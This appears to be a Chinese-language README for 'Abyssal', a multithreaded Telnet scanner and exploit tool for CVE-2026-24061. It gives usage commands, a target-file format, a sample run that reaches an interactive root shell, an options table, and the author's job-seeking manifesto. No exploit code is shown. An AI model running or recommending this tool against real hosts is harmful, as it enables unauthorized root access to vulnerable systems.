
Abyssal is a high-performance Telnet vulnerability scanner for CVE-2026-24061, delivering root shells on vulnerable systems with false-positive detection.
CVE-2026-24061 Telnet 漏洞扫描器与利用工具
从深渊崛起。
多线程、误报检测、成功后交互式 root shell。
本项目由一位在网络安全、基础设施和软件开发领域拥有数十年一线工作经验的专业 IT 人士打造。本人现年 55 岁,正积极寻找新机会——无论是全职员工、自由职业者还是项目合作者。如果您珍视经验、深厚的技术知识以及直截了当的问题解决方式,欢迎联系我。
📫 我接受全球范围内的工作机会。
✉️ 联系方式:[[email protected]]
📖 用法
基本扫描(非交互式)
python3 abyssal.py -f targets.txt
交互模式(成功后获取 Shell)
python3 abyssal.py -f targets.txt --interactive
高级选项
python3 abyssal.py -f targets.txt -t 20 --interactive -o scan.log
命令行选项
📂 目标文件格式
创建一个文件,每行一个目标:
# 单个 IP
192.168.1.100
10.0.0.50
# 指定端口的 IP
192.168.1.200:2323
# 子网(CIDR)— 即将支持
# 192.168.1.0/24
# 允许注释
172.16.1.25 # 办公室服务器
📊 示例输出
╔═══════════════════════════════════════════════════════════════════════════════╗
║ ║
║ █████╗ ██████╗ ██╗ ██╗███████╗███████╗ █████╗ ██╗ ║
║ ██╔══██╗██╔══██╗╚██╗ ██╔╝██╔════╝██╔════╝██╔══██╗██║ ║
║ ███████║██████╔╝ ╚████╔╝ ███████╗███████╗███████║██║ ║
║ ██╔══██║██╔══██╗ ╚██╔╝ ╚════██║╚════██║██╔══██║██║ ║
║ ██║ ██║██████╔╝ ██║ ███████║███████║██║ ██║███████╗ ║
║ ╚═╝ ╚═╝╚═════╝ ╚═╝ ╚══════╝╚══════╝╚═╝ ╚═╝╚══════╝ ║
║ ║
║ Abyssal - CVE-2026-24061 Telnet 漏洞扫描器 ║
║ "从深渊崛起。" ║
║ ║
║ 构建者:Klaus Baumdick ║
║ 联系方式:[email protected] ║
║ 状态:全球范围内寻找新机会 ║
║ ║
╚═══════════════════════════════════════════════════════════════════════════════╝
⚠️ 交互模式已启用!
遇到真实登录提示符或 shell 时,控制权将移交给您。
自动检测并忽略误报。
按 CTRL+C 中止。
正在启动扫描,10 个并行线程
总计:100 个待测目标
============================================================
🎯 在 192.168.1.100:23 上获得真实 ROOT SHELL(#)!
============================================================
>>> 您现在拥有 shell 访问权限!
>>> 执行任意命令(whoami, id, ls 等)
>>> 输入 'exit' 或按 CTRL+C 关闭连接
------------------------------------------------------------
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)
# exit
[*] 192.168.1.100:23 上的会话已关闭。
============================================================
扫描完成
============================================================
耗时:45.23 秒
已测试目标:100
📊 摘要:
✅ 真实易受攻击: 15
🔒 受保护: 42
❓ 失败: 23
🌐 不可达: 20
⚠️ 误报: 0
🚨 安全警告:
15 个系统真的易受 CVE-2026-24061 攻击!
→ 立即禁用或修补 Telnet!
→ 使用 SSH 作为安全替代方案!
⚠️ 免责声明
本工具仅供授权的安全测试和教育目的使用。
仅可用于您拥有或已获得明确书面许可的系统。
未经授权访问计算机系统是违法的。
作者不对误用本工具承担任何责任。
请负责任地使用,风险自负。
📝 许可证
本项目采用 MIT 许可证 — 详情请参阅 LICENSE 文件。
🤝 联系
Klaus Baumdick 📫 邮箱:[email protected]
🔗 GitHub:github.com/stoerti2
📌 状态:全球范围内寻找新机会
📚 参考资料
CVE-2026-24061
GNU InetUtils Telnetd 漏洞
git clone https://github.com/stoerti2/abyssal.git
#┌────────────────────────────────────────────────────────────────────────┐
#│ │
#│ ███████╗████████╗ ██████╗ ███████╗██████╗ ████████╗██╗ │
#│ ██╔════╝╚══██╔══╝██╔═══██╗██╔════╝██╔══██╗╚══██╔══╝██║ │
#│ ███████╗ ██║ ██║ ██║█████╗ ██████╔╝ ██║ ██║ │
#│ ╚════██║ ██║ ██║ ██║██╔══╝ ██╔══██╗ ██║ ██║ │
#│ ███████║ ██║ ╚██████╔╝███████╗██║ ██║ ██║ ██║ │
#│ ╚══════╝ ╚═╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝ ╚═╝ ╚═╝ │
#│ │
#│ "老派,依然 root" │
#│ "stoerti - 失业黑客" │
#│ │
#│ ┌──────────────────────────────────────────────────────────────┐ │
#│ │ 40 年奋战在一线。 │ 在德国失业 6 个月。 │ │
#│ │ 他们解雇了懂行的人。 │ 这是我的遗产。 │ │
#│ │ -- 现实没有补丁 -- │ │
#│ └──────────────────────────────────────────────────────────────┘ │
#│ │
#└───────────────────────────────────────────────────────────────】───────```
## 这是 Grindware
什么是 Grindware?
Grindware 是一种软件,它的存在是因为没有人付钱让我去构建真正重要的东西。
我已经失业六个月了。不是因为我不会编码——而是因为市场不再看重技能。它看重的是流行词、证书和人际关系。
所以我不再等待永远不会到来的工作,而是开始构建。
Grindware 就是它的产物。
### Grindware 的理念
**源于需求** — 不为利润,不为投资者,不为产品路线图。只是因为某些东西需要存在,而别人不会去构建。
**免费发布** — 当你经历过一无所有的感觉时,你会觉得把代码锁在付费墙后面是不对的。
**诚实** — 没有营销废话,没有"企业级"的噱头。只有能用的代码。
**未打磨但实用** — 它完成了任务。如果你需要一个漂亮的界面,请移步别处。
### 为什么叫 "Grindware"?
因为就是这样。在磨砺中写出的代码。在深夜。在第 47 次求职被拒后。在意识到系统并不在乎你的时候,你不如构建自己的东西。
Grindware 是生存代码。
### Grindware 为谁服务?
厌倦了公司废话的开发者
需要真正能用的工具的安全研究员
任何相信软件应该有用,而不是仅仅有利可图的人
也在磨砺中挣扎的人们
### Grindware 不是什么
不是公司
不是初创公司
不是产品
不出售
Grindware 只是代码。从一个失业的开发者到全世界。
### 支持 Grindware
如果你使用 Grindware,那就足够了。如果你想支持它,你可以:
⭐ 给仓库加星
🐛 报告 bug
🔧 贡献代码
💬 把它分享给可能需要的人
### 联系方式
我一直对工作机会持开放态度。如果你需要一个真正构建东西的开发者,我们谈谈。
Grindware – 在磨砺中构建,免费发布。
## 📬 联系方式
如有关于此数据集的问题或咨询,请联系 [email protected]
---
**最后更新:** 2026 年 7 月
| 选项 | 描述 |
|---|
-f, --file | 包含 IP 地址的文件(默认:ip_list.txt) |
-t, --threads | 并行线程数(默认:10) |
-i, --interactive | 交互模式 — 在易受攻击的系统上获取 shell |
-o, --output | 日志文件名(未指定时自动生成) |
-c, --connect-timeout | 连接超时秒数(默认:5) |
-s, --session-timeout | 会话超时秒数(默认:10) |
--version | 显示版本信息 |
-h, --help | 显示帮助信息 |